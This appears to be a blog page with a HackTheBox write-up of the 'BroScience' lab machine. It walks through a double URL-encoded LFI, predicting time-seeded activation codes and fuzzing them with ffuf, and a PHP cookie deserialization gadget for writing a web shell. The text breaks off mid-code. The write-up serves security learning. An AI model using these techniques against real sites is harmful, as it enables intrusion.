<!DOCTYPE html>
<html lang=" en-US">

<head>
  <meta charset='utf-8'>
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <!-- <meta name="viewport" content="width=device-width, initial-scale=0.5"> -->
  <meta name="viewport" content="width=device-width, initial-scale=0.5, minimum-scale=0.5, maximum-scale=0.5">
  <link rel="stylesheet" href="/assets/css/style.css?v=">
  <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->
<html>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4BJGEL04W9"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag() {dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-4BJGEL04W9');
</script>

</html>


<!-- You can set your favicon here -->

<!-- end custom head snippets -->

  <title>Rokos Replicant</title>

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<title>0x00nier | Rokos Replicant</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="0x00nier" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Rokos Replicant" />
<meta property="og:description" content="Rokos Replicant" />
<link rel="canonical" href="http://localhost:4000/blogs/htb/broscience/broscience.html" />
<meta property="og:url" content="http://localhost:4000/blogs/htb/broscience/broscience.html" />
<meta property="og:site_name" content="0x00nier" />
<meta property="og:type" content="website" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="0x00nier" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"WebPage","description":"Rokos Replicant","headline":"0x00nier","url":"http://localhost:4000/blogs/htb/broscience/broscience.html"}</script>
<!-- End Jekyll SEO tag -->

</head>

<body>

  <header>
    <div class="container">
      <a id="a-title" href="/">
        <h1>0x00nier</h1>
      </a>

      <a id="a-title" href="../../../../../../../../../blogs.html" style="text-decoration:none">
        <h1 style="font-size: 18px;float:right;margin-top: -40px; margin-right: 5px;">writeups/</h1>
      </a>

      <a id="a-title" href="../../../../../../../../../experience.html" style="text-decoration:none">
        <h1 style="font-size: 18px;float:right;margin-top: -40px; margin-right: 120px;">xp/</h1>
      </a>

      <a id="a-title" href="../../../../../../../../../aboutme.html" style="text-decoration:none">
        <h1 style="font-size: 18px; float:right;margin-top: -40px;margin-right: 175px;">whoami/</h1>
      </a>
    </div>
  </header>

  <div class="container">
    <section id="main_content">
      <h1 id="broscience-medium-hackthebox-write-up">BroScience (Medium)— HackTheBox Write-up</h1>

<p>Hello everyone, welcome to this write-up where we will delve into the details of BroScience, a moderate-difficulty challenge on HackTheBox. I found this machine particularly intriguing as it required the use of techniques that were new to me, both in terms of gaining initial access and escalating privileges.</p>

<p><img src="./img/chal.webp" alt="" /></p>

<p>As we can see from the logo, this machine will be a Linux-based Box. With that said, let’s begin with recon.</p>

<blockquote>
  <p>Note — Code snippets shall be limited to necessary parts and not be fully copied</p>
</blockquote>

<h2 id="reconnaissance">Reconnaissance</h2>

<p><img src="./img/rustscan.webp" alt="" /></p>

<p>Upon performing a quick scan using <code class="language-plaintext highlighter-rouge">Rustscan</code>, we discovered three open ports. In this instance, I chose not to run a <code class="language-plaintext highlighter-rouge">Nmap</code> scan as I was confident that the ports in question were those of an <code class="language-plaintext highlighter-rouge">SSH</code> server and an HTTP/HTTPS endpoint (This is not good practice but in this case it wasn’t necessary). When attempting to access the IP address through a web browser, the following was displayed:</p>

<p><img src="./img/empty_link.webp" alt="" /></p>

<p>This just means we need to add this domain to our hosts file.</p>

<p><img src="./img/hostsedit.webp" alt="" /></p>

<p>After we do this, we reopen the site and see the following -</p>

<p><img src="./img/site.webp" alt="" /></p>

<p>The website appears to contain a collection of short posts on various exercises. I suspect that the name <code class="language-plaintext highlighter-rouge">BroScience</code> is a playful reference to the trend of gym-goers spreading unscientific advice. I am not sure but the name seems to fit in with that theme.</p>

<p>After exploring the site, I discovered several pages such as <code class="language-plaintext highlighter-rouge">user.php</code>, <code class="language-plaintext highlighter-rouge">login.php</code>, <code class="language-plaintext highlighter-rouge">register.php</code> and <code class="language-plaintext highlighter-rouge">exercise.php</code>, which did not seem particularly noteworthy at first glance. Therefore, I decided to conduct a quick directory and file bruteforce using <code class="language-plaintext highlighter-rouge">dirsearch</code> to see if there were any hidden pages.</p>

<p><img src="./img/dirsearch.webp" alt="" /></p>

<p>Here, my attention was caught by the <code class="language-plaintext highlighter-rouge">includes</code> directory. Let’s check it out.</p>

<p><img src="./img/inicludes.webp" alt="" /></p>

<p>Upon examining the <code class="language-plaintext highlighter-rouge">includes</code> directory, I discovered several intriguing PHP files. One that stood out in particular was <code class="language-plaintext highlighter-rouge">db_connect.php</code>, as it likely contained the credentials for the database in use. Although the other files appeared to be less significant, I still opened each one to see if there were any other leads.</p>

<p>And luckily, I quickly stumbled upon a good lead.</p>

<p><img src="./img/path.webp" alt="" /></p>

<p>My initial guess was that the page loads image files stored on the server using the <code class="language-plaintext highlighter-rouge">path</code> parameter, indicating the possibility of a local file inclusion (LFI) vulnerability. I attempted to access <code class="language-plaintext highlighter-rouge">/etc/passwd</code> using the traditional LFI method, but it was unsuccessful. I then tried URL-encoding the string passed in the path parameter, but this also did not yield any results. From my experience, however, I know that sometimes double URL-encoding can work when single encoding does not.</p>

<p>Turns out that was the case :)</p>

<p><img src="./img/lfi.webp" alt="" /></p>

<p>Lovely. An LFI vulnerability is always a nice find. Although given that the server is programmed in PHP, it’s not a particularly surprising vector. This means I can now read the source code for other files on the server. I attempted to register a user on the site and it prompted me for an activation code. Without it, I was unable to log in. First, let’s attempt to register a user.</p>

<p><img src="./img/register.webp" alt="" /></p>

<p>When we try to login as it is, it reports the following -</p>

<p><img src="./img/login.webp" alt="" /></p>

<p>Thus, I decided to leverage the LFI we found and see what’s going on behind <code class="language-plaintext highlighter-rouge">login.php</code>.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="nb">session_start</span><span class="p">();</span>

<span class="c1">// Check if user is logged in already</span>
<span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'id'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nb">header</span><span class="p">(</span><span class="s1">'Location: /index.php'</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Handle a submitted log in form</span>
<span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="c1">// Check if variables are empty</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]))</span> <span class="p">{</span>
        <span class="k">include_once</span> <span class="s1">'includes/db_connect.php'</span><span class="p">;</span>

        <span class="c1">// Check if username:password is correct</span>
        <span class="nv">$res</span> <span class="o">=</span> <span class="nb">pg_prepare</span><span class="p">(</span><span class="nv">$db_conn</span><span class="p">,</span> <span class="s2">"login_query"</span><span class="p">,</span> <span class="s1">'SELECT id, username, is_activated::int, is_admin::int FROM users WHERE username=$1 AND password=$2'</span><span class="p">);</span>
        <span class="nv">$res</span> <span class="o">=</span> <span class="nb">pg_execute</span><span class="p">(</span><span class="nv">$db_conn</span><span class="p">,</span> <span class="s2">"login_query"</span><span class="p">,</span> <span class="k">array</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">],</span> <span class="nb">md5</span><span class="p">(</span><span class="nv">$db_salt</span> <span class="mf">.</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])));</span>

        <span class="k">if</span> <span class="p">(</span><span class="nb">pg_num_rows</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// Check if account is activated</span>
            <span class="nv">$row</span> <span class="o">=</span> <span class="nb">pg_fetch_row</span><span class="p">(</span><span class="nv">$res</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">((</span><span class="n">bool</span><span class="p">)</span><span class="nv">$row</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> <span class="p">{</span>
                <span class="c1">// User is logged in</span>
                <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'id'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$row</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
                <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$row</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
                <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'is_admin'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$row</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>

                <span class="c1">// Redirect to home page</span>
                <span class="nb">header</span><span class="p">(</span><span class="s1">'Location: /index.php'</span><span class="p">);</span>
            <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                <span class="nv">$alert</span> <span class="o">=</span> <span class="s2">"Account is not activated yet"</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="nv">$alert</span> <span class="o">=</span> <span class="s2">"Username or password is incorrect."</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nv">$alert</span> <span class="o">=</span> <span class="s2">"Please fill in both username and password."</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>From the code, it is clear that the system checks for a column <code class="language-plaintext highlighter-rouge">is_activated</code> to determine if a user is active or not. However, it was not immediately apparent where the activation codes were generated or how the activation mechanism worked. I decided to investigate some of the PHP files in the <code class="language-plaintext highlighter-rouge">includes</code> directory to try and find more information. I suspected that <code class="language-plaintext highlighter-rouge">img.php</code> would not contain the information I was looking for. <code class="language-plaintext highlighter-rouge">db_connect.php</code>, <code class="language-plaintext highlighter-rouge">navbar.php</code> and <code class="language-plaintext highlighter-rouge">header.php</code> also seemed unlikely to be useful, so I decided to check <code class="language-plaintext highlighter-rouge">utils.php</code>.</p>

<p>I found a function that generates activation codes in <code class="language-plaintext highlighter-rouge">utils.php</code>. However, it was still unclear to me how I would obtain the correct code. It felt like I had missed something important. I decided to bruteforce for PHP files only using the <code class="language-plaintext highlighter-rouge">directory-2.3-medium</code> wordlist, using <code class="language-plaintext highlighter-rouge">feroxbuster</code> for this task. And I found something -</p>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Tmp <span class="o">&gt;</span> feroxbuster <span class="nt">--url</span> https://broscience.htb <span class="nt">-eknr</span> <span class="nt">-w</span> <span class="s1">'/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt'</span> <span class="nt">-x</span> php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__<span class="o">)</span> |__<span class="o">)</span> | /  <span class="sb">`</span>    /  <span class="se">\ \_</span>/ | |  <span class="se">\ </span>|__
|    |___ |  <span class="se">\ </span>|  <span class="se">\ </span>| <span class="se">\_</span>_,    <span class="se">\_</span>_/ / <span class="se">\ </span>| |__/ |___
by Ben <span class="s2">"epi"</span> Risher 🤓                 ver: 2.7.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ https://broscience.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ <span class="o">[</span>200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout <span class="o">(</span>secs<span class="o">)</span>        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ <span class="nb">true</span>
 💲  Extensions            │ <span class="o">[</span>php]
 🏁  HTTP methods          │ <span class="o">[</span>GET]
 🔓  Insecure              │ <span class="nb">true</span>
 📍  Follow Redirects      │ <span class="nb">true</span>
 🚫  Do Not Recurse        │ <span class="nb">true</span>
───────────────────────────┴──────────────────────
 🏁  Press <span class="o">[</span>ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET        3l        7w       44c https://broscience.htb/styles/light.css
200      GET      147l      510w        0c https://broscience.htb/index.php
200      GET       45l      104w     2161c https://broscience.htb/register.php
200      GET       42l       97w     1936c https://broscience.htb/login.php
200      GET      904l     5421w   297898c https://broscience.htb/images/tricep_extensions.jpeg
200      GET       28l       71w     1322c https://broscience.htb/exercise.php
200      GET      383l     2045w   111620c https://broscience.htb/images/barbell_squats.jpeg
200      GET        1l        4w       39c https://broscience.htb/includes/img.php
200      GET       29l       70w     1309c https://broscience.htb/user.php
200      GET      147l      510w        0c https://broscience.htb/
403      GET        9l       28w      280c https://broscience.htb/.php
200      GET     3270l    20216w  1011236c https://broscience.htb/images/deadlift.png
200      GET      161l     1002w    46318c https://broscience.htb/images/seated_rows.png
200      GET     2608l    13980w   598012c https://broscience.htb/images/shoulder_press.jpeg
200      GET      122l      678w    31116c https://broscience.htb/images/bench.png
200      GET      220l     1542w    68890c https://broscience.htb/images/reverse_butterfly.jpeg
200      GET     1193l     6976w   326860c https://broscience.htb/images/dumbell_curls.jpeg
200      GET       23l      124w     2456c https://broscience.htb/images/
200      GET        0l        0w        0c https://broscience.htb/includes/db_connect.php
200      GET        5l       14w      369c https://broscience.htb/includes/header.php
200      GET        0l        0w        0c https://broscience.htb/includes/utils.php
500      GET        2l        4w       65c https://broscience.htb/includes/navbar.php
200      GET      127l      637w     9903c https://broscience.htb/manual/tr/index.html
200      GET       20l      102w     1753c https://broscience.htb/includes/
200      GET      123l      648w     9828c https://broscience.htb/manual/pt-br/index.html
200      GET      121l      605w     9416c https://broscience.htb/manual/da/index.html
200      GET      129l      701w    10325c https://broscience.htb/manual/es/index.html
200      GET      129l      566w    10124c https://broscience.htb/manual/ja/index.html
200      GET      124l      553w     9400c https://broscience.htb/manual/zh-cn/index.html
200      GET      127l      636w     9666c https://broscience.htb/manual/en/index.html
200      GET      130l      623w     9843c https://broscience.htb/manual/de/index.html
403      GET        9l       28w      280c https://broscience.htb/javascript/
200      GET      127l      643w    10996c https://broscience.htb/manual/ru/index.html
200      GET      130l      683w    10033c https://broscience.htb/manual/fr/index.html
200      GET      118l      578w     8774c https://broscience.htb/manual/ko/index.html
200      GET       14l       28w      676c https://broscience.htb/manual/
200      GET        3l        7w       41c https://broscience.htb/styles/dark.css
200      GET       17l       71w     1134c https://broscience.htb/styles/
200      GET       28l       66w     1256c https://broscience.htb/activate.php
</code></pre></div></div>

<p>Just below, I found <code class="language-plaintext highlighter-rouge">activate.php</code>. This was great news as it meant that I could now activate my newly created account.</p>

<p><img src="./img/invalid.webp" alt="" /></p>

<p>I made an educated guess about the parameter here and was fortunate to discover that it was “code”. If that had not been the case, I could have used the previously discovered LFI vulnerability to look it up. With the endpoint in hand, I could now supply the code to activate my account. However, I first needed to generate the correct code. Thus, I investigated the code responsible for generating the codes.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="k">function</span> <span class="n">generate_activation_code</span><span class="p">()</span> <span class="p">{</span>
    <span class="nv">$chars</span> <span class="o">=</span> <span class="s2">"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"</span><span class="p">;</span>
    <span class="nb">srand</span><span class="p">(</span><span class="nb">time</span><span class="p">());</span>
    <span class="nv">$activation_code</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;</span> <span class="mi">32</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$activation_code</span> <span class="o">=</span> <span class="nv">$activation_code</span> <span class="mf">.</span> <span class="nv">$chars</span><span class="p">[</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$chars</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)];</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="nv">$activation_code</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In summary, the code sets a seed for randomization to the time at which the function runs, then selects 32 random characters and symbols from a predefined list, and appends them to <code class="language-plaintext highlighter-rouge">activation_code</code>. Unfortunately, since the code generation is time-dependent, we can’t use the account that was previously created. It’s not a major issue, I could simply create another one. However, as I registered, I also ran the code generation simultaneously. I noticed that I had approached this task in a different manner compared to the other writeups on this machine. To be more precise, I utilized the PHP snippet to print out the <code class="language-plaintext highlighter-rouge">activation_code</code> as it was generated.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="k">function</span> <span class="n">generate_activation_code</span><span class="p">()</span> <span class="p">{</span>
    <span class="nv">$chars</span> <span class="o">=</span> <span class="s2">"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"</span><span class="p">;</span>
    <span class="nb">srand</span><span class="p">(</span><span class="nb">time</span><span class="p">());</span>
    <span class="nv">$activation_code</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;</span> <span class="mi">32</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$activation_code</span> <span class="o">=</span> <span class="nv">$activation_code</span> <span class="mf">.</span> <span class="nv">$chars</span><span class="p">[</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$chars</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)];</span>
    <span class="p">}</span>
    <span class="k">echo</span> <span class="nv">$activation_code</span><span class="p">;</span>
    <span class="k">return</span> <span class="nv">$activation_code</span><span class="p">;</span>
<span class="p">}</span>
<span class="nf">generate_activation_code</span><span class="p">()</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>We used the <code class="language-plaintext highlighter-rouge">echo</code> function on the variable <code class="language-plaintext highlighter-rouge">activation_code</code> so that it prints out the code during runtime. Our next step is to register a user and run multiple iterations of this script. The script will run both before and after registering. Then, I can use all the generated activation codes to fuzz the <code class="language-plaintext highlighter-rouge">activate.php</code> endpoint. With this approach, it’s highly likely that one of the codes will be the correct one.</p>

<p><img src="./img/act_cods.webp" alt="" /></p>

<p>After running multiple iterations, we were able to narrow down the possible activation codes to around 49. Now, we will try to fuzz the <code class="language-plaintext highlighter-rouge">activate.php</code> endpoint with these values.</p>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Tmp <span class="o">&gt;</span> ffuf <span class="nt">-u</span> <span class="s1">'https://broscience.htb/activate.php?code=FUZZ'</span> <span class="nt">-w</span> act_codes1 <span class="nt">-timeout</span> 100 <span class="nt">-t</span> 100 <span class="nt">-fl</span> 28

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0 Kali Exclusive &lt;3
________________________________________________

 :: Method           : GET
 :: URL              : https://broscience.htb/activate.php?code=FUZZ
 :: Wordlist         : FUZZ: act_codes1
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 100
 :: Threads          : 100
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response lines: 28
________________________________________________

:: Progress: [49/49] :: Job [1/1] :: 26 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
</span></code></pre></div></div>

<p>After running this, we should be able to log in (this is a hit-and-miss method, so I gave a delay between pre-registration, registration, and post-registration. In case it doesn’t work, I would create another account and try again).</p>

<p><img src="./img/gottem.webp" alt="" /></p>

<p>And I was able to log in. I discovered a new feature on the site, the ability to switch between light and dark themes. It appeared that the <code class="language-plaintext highlighter-rouge">swap_theme.php</code> file was responsible for this functionality. Since there were no other notable features, I decided to examine the source code of <code class="language-plaintext highlighter-rouge">swap_theme.php</code> to see if there were any vulnerabilities or useful information.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="nb">session_start</span><span class="p">();</span>

<span class="c1">// Check if user is logged in already</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'id'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nb">header</span><span class="p">(</span><span class="s1">'Location: /index.php'</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Swap the theme</span>
<span class="k">include_once</span> <span class="s2">"includes/utils.php"</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">strcmp</span><span class="p">(</span><span class="nf">get_theme</span><span class="p">(),</span> <span class="s2">"light"</span><span class="p">)</span> <span class="o">===</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="nf">set_theme</span><span class="p">(</span><span class="s2">"dark"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="nf">set_theme</span><span class="p">(</span><span class="s2">"light"</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Redirect</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_REFERER'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: </span><span class="si">{</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_REFERER'</span><span class="p">]</span><span class="si">}</span><span class="s2">"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: /index.php"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Interesting. I found that some functions from <code class="language-plaintext highlighter-rouge">utils.php</code> are being used in this file. We had already examined <code class="language-plaintext highlighter-rouge">utils.php</code> previously when we were looking for the activation code generation. Let’s take a closer look at the code responsible for the theme changes.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">function</span> <span class="n">get_theme</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'id'</span><span class="p">]))</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'user-prefs'</span><span class="p">]))</span> <span class="p">{</span>
            <span class="nv">$up_cookie</span> <span class="o">=</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nb">serialize</span><span class="p">(</span><span class="k">new</span> <span class="nc">UserPrefs</span><span class="p">()));</span>
            <span class="nb">setcookie</span><span class="p">(</span><span class="s1">'user-prefs'</span><span class="p">,</span> <span class="nv">$up_cookie</span><span class="p">);</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="nv">$up_cookie</span> <span class="o">=</span> <span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'user-prefs'</span><span class="p">];</span>
        <span class="p">}</span>
        <span class="nv">$up</span> <span class="o">=</span> <span class="nb">unserialize</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$up_cookie</span><span class="p">));</span>
        <span class="k">return</span> <span class="nv">$up</span><span class="o">-&gt;</span><span class="n">theme</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">return</span> <span class="s2">"light"</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kd">class</span> <span class="nc">Avatar</span> <span class="p">{</span>
    <span class="k">public</span> <span class="nv">$imgPath</span><span class="p">;</span>

    <span class="k">public</span> <span class="k">function</span> <span class="n">__construct</span><span class="p">(</span><span class="nv">$imgPath</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">imgPath</span> <span class="o">=</span> <span class="nv">$imgPath</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">public</span> <span class="k">function</span> <span class="n">save</span><span class="p">(</span><span class="nv">$tmp</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$f</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">imgPath</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">);</span>
        <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$f</span><span class="p">,</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="nv">$tmp</span><span class="p">));</span>
        <span class="nb">fclose</span><span class="p">(</span><span class="nv">$f</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kd">class</span> <span class="nc">AvatarInterface</span> <span class="p">{</span>
    <span class="k">public</span> <span class="nv">$tmp</span><span class="p">;</span>
    <span class="k">public</span> <span class="nv">$imgPath</span><span class="p">;</span>

    <span class="k">public</span> <span class="k">function</span> <span class="n">__wakeup</span><span class="p">()</span> <span class="p">{</span>
        <span class="nv">$a</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Avatar</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">imgPath</span><span class="p">);</span>
        <span class="nv">$a</span><span class="o">-&gt;</span><span class="nf">save</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">tmp</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>Lots of things going on here. In short, I found that a cookie called <code class="language-plaintext highlighter-rouge">user_prefs</code> is vulnerable to a deserialization attack. I remembered that the <code class="language-plaintext highlighter-rouge">unserialize()</code> function takes a single serialized variable and converts it back into a PHP value from PHP’s manual, and immediately realized that this vulnerability is similar to the deserialization attacks that can occur in Java and Python. I had never encountered this type of vulnerability in PHP before, so it was new to me to learn.</p>

<p>In this case, an object from the class <code class="language-plaintext highlighter-rouge">UserPrefs</code> is serialized, then base64 encoded, and set as a cookie. This same cookie is then used for deserialization to obtain the current theme’s details. It was clear that this cookie would be our entry point.</p>

<p>The <code class="language-plaintext highlighter-rouge">AvatarInterface</code> class features a save() function in the <code class="language-plaintext highlighter-rouge">__wakeup()</code> public function. If we create a serialized string that points <code class="language-plaintext highlighter-rouge">tmp</code> to a PHP shell we create and imgPath to a location in <code class="language-plaintext highlighter-rouge">/var/www/html</code>, we can access our shell from the site itself.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="kd">class</span> <span class="nc">Avatar</span> <span class="p">{</span>
<span class="k">public</span> <span class="nv">$imgPath</span><span class="p">;</span>

<span class="k">public</span> <span class="k">function</span> <span class="n">__construct</span><span class="p">(</span><span class="nv">$imgPath</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$this</span><span class="o">-&gt;</span><span class="n">imgPath</span> <span class="o">=</span> <span class="nv">$imgPath</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">public</span> <span class="k">function</span> <span class="n">save</span><span class="p">(</span><span class="nv">$tmp</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$f</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">imgPath</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">);</span>
    <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$f</span><span class="p">,</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="nv">$tmp</span><span class="p">));</span>
    <span class="nb">fclose</span><span class="p">(</span><span class="nv">$f</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>

<span class="kd">class</span> <span class="nc">AvatarInterface</span> <span class="p">{</span>
<span class="k">public</span> <span class="nv">$tmp</span><span class="p">;</span>
<span class="k">public</span> <span class="nv">$imgPath</span><span class="p">;</span>

<span class="k">public</span> <span class="k">function</span> <span class="n">__wakeup</span><span class="p">()</span> <span class="p">{</span>
